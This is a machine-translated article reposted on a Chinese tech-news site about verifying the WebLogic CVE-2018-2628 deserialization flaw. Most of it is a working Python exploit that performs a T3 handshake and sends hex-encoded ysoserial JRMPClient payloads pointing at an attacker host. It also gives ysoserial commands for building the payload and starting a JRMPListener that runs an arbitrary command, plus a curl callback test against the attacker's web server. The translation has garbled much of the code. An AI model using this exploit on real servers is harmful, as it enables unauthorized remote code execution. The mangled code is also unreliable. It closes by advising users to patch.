Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to verify the WebLogic CVE-2018-2628 loophole. Many people may not know much about it. In order to make you understand better, the editor has summarized the following for you. I hope you can get something according to this article.

1. Summary of vulnerabilities

In the early morning of April 18, Beijing time, Oracle officially released a key patch update CPU (CriticalPatchUpdate) for April, which contains a high-risk Weblogic deserialization vulnerability (CVE-2018-2628) through which an attacker can remotely execute code without authorization. An attacker only needs to send carefully constructed T3 protocol data to gain privileges on the target server. An attacker can exploit this vulnerability to control components and affect the availability, confidentiality and integrity of data.

Second, the scope of impact of vulnerabilities

The scope of impact of the vulnerability includes:

OracleWebLogicServer10.3.6.0

OracleWebLogicServer12.1.3.0

OracleWebLogicServer12.2.1.2

OracleWebLogicServer12.2.1.3

Third, the current situation of vulnerability verification

At present, there are many verification codes on github to detect this vulnerability, but most of the codes contain an IP address 104.251.228.50 that belongs to the United States in the PAYLOAD field, as shown below:

In [2]: PAYLOAD= ['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72...: 787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c...: 6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a617661...: 0000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e..: 03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea9.: 0b00000000000000000000000000000000000000000000000000000078'] In [3]: PAYLOAD [0] .decode (' hex') Out [3]: "\ xac\ xed\ X00\ X05s}\ X00\ X00\ x1djava.rmi.activation.Activatorxr\ X00\ x17java.lang.reflect.Proxy\ xe1'\ xda\ xcc\ x10C\ xcb\ X02 \ X00\ x01L\ X00\ x01ht\ x00%Ljava/lang/reflect/InvocationHandler Xpsr\ x00-java.rmi.server.RemoteObjectInvocationHandler\ X00\ X02\ X00\ x00xr\ X00\ x1cjava.rmi.server.RemoteObject\ xb4\ X91\ x0ca3\ X03\ x00xpw7\ X00\ nUnicastRef\ X00\ x0e104.251.228.50\ X00\ x1bY\ X00\ X00\ X01\ xee\ xa9\ X00\ X00 My vulnerability verification

In this regard, I set up an experimental environment to test it and share my experience with you (the IP addresses involved in the whole test are all addresses in the experimental environment)

4.1 vulnerability verification code

First paste my code, only for single-threaded sample code, multi-threaded please modify the gods themselves

# coding: utf-8

Import re

Import sys

Import socket

From time import sleep

VUL= ['CVE-2018-2628']

# Custom listening address is required, which is currently 11.10.67.83

PAYLOAD= ['aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707734000a556e6963617374526566000b31312e31302e36372e38330000044bffffffff981c9bd400000000000000000000000000000078']

VER_SIG= ['\ $Proxy [0-9] +']

Def t3handshake (sock, server_addr):

Sock.connect (server_addr)

Sock.send ('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode (' hex'))

Sleep (1)

Sock.recv (1024)

Sys.stdout.write ('handshake successful\ n')

Def buildT3RequestObject (sock, dport):

Data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'

Data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000 {0} ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format (' {: 04x} '.format (dport))

Data3 = '1a7727000d3234322e323134'

Data4 = '2e312e32353461863d1d00000078'

For d in [data1, data2, data3, data4]:

Sock.send (d.decode ('hex'))

Sleep (2)

Sys.stdout.write ('send request payload successful,recv length:%d\ n'% (len (sock.recv (2048)

Def sendEvilObjData (sock, data):

Payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'

Payload+=data

Payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'

Payload ='% s% s'% ('{: 08x} '.format (len (payload) / 2 + 4), payload)

Sock.send (payload.decode ('hex'))

Sleep (2)

Sock.send (payload.decode ('hex'))

Res =''

Try:

While True:

Res + = sock.recv (4096)

Sleep (0.1)

Except Exception as e:

Pass

Return res

Def checkVul (res, server_addr, index):

P=re.findall (VER_SIG [index], res, re.S)

If len (p) > 0:

Return'[+] {}: {} is vul {} '.format (server_addr [0], server_addr [1], VUL [index])

Else:

Return'[-] {}: {} is not vul {} '.format (server_addr [0], server_addr [1], VUL [index])

Def run (* args):

Dip = args [0]

Dport = args [1]

Sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

# after patching, it will block, so set the timeout. Default is 15s, and adjust it according to the situation.

Sock.settimeout (15)

Server_addr = (dip, dport)

T3handshake (sock, server_addr)

BuildT3RequestObject (sock, dport)

Rs=sendEvilObjData (sock, PAYLOAD [index])

Print checkVul (rs, server_addr, index)

Def single ():

Dip = sys.argv [1]

Dport = int (sys.argv [2])

Run (dip, dport)

If _ _ name__ = ='_ _ main__':

Index = 0

Single ()

4.2 PAYLOAD field modification

For how to modify the address in the PAYLOAD field in the code, you can use ysoserial to obtain it, the command is:

$java-jar ysoserial-master.jar JRMPClient 11.10.67.83 virtual 1099 | xxd

00000000: aced 0005 737d 0000 0001 001a 6a61 7661.... s} .java

00000010: 2e72 6d69 2e72 6567 6973 7472 792e 5265 .rmi.registry.Re

00000020: 6769 7374 7279 7872 0017 6a61 7661 2e6c gistryxr..java.l

00000030: 616e 672e 7265 666c 6563 742e 5072 6f78 ang.reflect.Prox

00000040: 79e1 27da 20cc 1043 cb02 0001 4c00 0168. .. C....L..h

00000050: 7400 254c 6a61 7661 2f6c 616e 672f 7265 t.%Ljava/lang/re

00000060: 666c 6563 742f 496e 766f 6361 7469 6f6e flect/Invocation

00000070: 4861 6e64 6c65 723b 7870 7372 002d 6a61 Handler;xpsr.-ja

00000080: 7661 2e72 6d69 2e73 6572 7665 722e 5265 va.rmi.server.Re

00000090: 6d6f 7465 4f62 6a65 6374 496e 766f 6361 moteObjectInvoca

000000a0: 7469 6f6e 4861 6e64 6c65 7200 0000 0000 tionHandler.

000000b0: 0000 0202 0000 7872 001c 6a61 7661 2e72 .xr..java.r

000000c0: 6d69 2e73 6572 7665 722e 5265 6d6f 7465 mi.server.Remote

000000d0: 4f62 6a65 6374 d361 b491 0c61 331e 0300 Object.a...a3...

000000e0: 0078 7077 3400 0a55 6e69 6361 7374 5265 .xpw4..UnicastRe

000000f0: 6600 0b31 312e 3130 2e36 372e 3833 0000 f..11.10.67.83..00000100: 044b ffff ffff c56f 9b74 0000 0000 0000 .K.o.t.00000110: 0000 0000 0000 0078 .x

Note that ysoserial depends on JDK, and you can get your own PAYLOAD by running the above command (here is

Aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707734000a556e6963617374526566000b31312e31302e36372e38330000044bffffffff981c9bd400000000000000000000000000000078

To replace the PAYLOAD content in the code

4.3 vulnerability verification

Set up the JRMPListener host through ysoserial, and enter the command to be returned to be executed as follows:

Java-cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "Command"

After running the above command, the test can be carried out formally. In order to verify the effect of remote code execution of this vulnerability, take the Linux server with Weblogic installed as an example, you can execute the curl command test, let it access our own Web server and view the Web log, if the log has the IP address of the target machine, and indicates that this vulnerability has been successfully exploited. Finally, the loophole verification effect is posted. The attack machine for this test is 11.10.67.83 (lab private IP), and RMPListener and Web services are enabled on this server.

The target machine is 11.10.138.61 (laboratory private IP)

Execute the following command on the attack plane to attack the target aircraft 11.10.138.61

Python test.py 11.10.138.61 7001

Displayed on the attack plane 11.10.67.83

You can see the result in the Web log of 11.10.67.83

It can be seen that this vulnerability allows the target plane 11.10.138.61 to access the Web service of attack plane 11.10.67.83.

Through the above experiments, we can see that this vulnerability does have the ability of remote code execution. Security and operation and maintenance personnel should be vigilant and fix this vulnerability as soon as possible. Oracle has officially provided a patch for this vulnerability, and it is strongly recommended that affected users upgrade and update to protect against this vulnerability as soon as possible.

After reading the above, do you have any further understanding of how to verify the WebLogic CVE-2018-2628 vulnerability? If you want to know more knowledge or related content, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.